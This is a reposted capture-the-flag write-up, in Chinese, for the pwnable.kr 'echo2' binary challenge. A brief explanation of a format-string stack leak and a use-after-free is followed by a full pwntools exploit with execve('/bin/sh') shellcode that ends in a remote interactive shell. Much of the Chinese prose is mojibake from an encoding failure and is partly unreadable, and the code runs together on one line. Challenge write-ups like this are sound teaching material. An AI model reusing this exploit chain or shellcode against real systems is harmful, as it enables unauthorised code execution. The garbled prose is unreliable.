[BUUCTF-pwn]——pwnable_echo2

附件

題解

沒(méi)那么多時(shí)間寫詳細(xì)的題解，就簡(jiǎn)單理一下思路了。
首先這個(gè)題目中通過(guò) 2. : FSB echo 我們可以泄露出來(lái)?xiàng)Ｉ系牡刂?#xff0c;這里我們泄露出來(lái)的是當(dāng)前棧幀rbp中存儲(chǔ)的地址，也就是mian函數(shù)的rbp地址。通過(guò)rbp與變量的關(guān)系，我們可以得到我們?cè)诔绦蜷_始運(yùn)行時(shí)寫入name的地址。由于棧是可執(zhí)行的，我們只需要將shellcode寫入我們要寫入的name的位置即可。不過(guò)長(zhǎng)度要小于24。
做到這一步第一步就完成了，下面我們需要利用uaf漏洞來(lái)劫持程序的執(zhí)行流。

這里我們首先始放o然后再申請(qǐng)o的空間對(duì)其進(jìn)行修改，由于指針沒(méi)有置零，最后可以利用o來(lái)進(jìn)行執(zhí)行。

exploit

from pwn import * p = process('./echo2') p = remote('pwnable.kr',9011) elf = ELF('./echo2') context_level = 'debug' context.arch = 'amd64' p.recvuntil("your name? : ") shellcode = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05' p.sendline(shellcode) p.recvuntil(b'> ') p.sendline(b'2') payload = b'%10$p' + b'a'*3 p.sendline(payload) p.recvuntil(b'0x') shellcode_addr = int(p.recvuntil(b'aaa',drop=True),16)-0x20 success('shellcode_addr----->:',hex(shellcode_addr)) print('-------------------------------------------------------------------------------------') p.recvuntil(b'> ') p.sendline(b'4') p.recvuntil(b'want to exit? (y/n)') p.sendline(b'n')p.recvuntil(b'> ') p.sendline(b'3') p.recvuntil(b'hello \n') p.sendline(b'a'*24 + p64(shellcode_addr))p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——pwnable_echo2的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。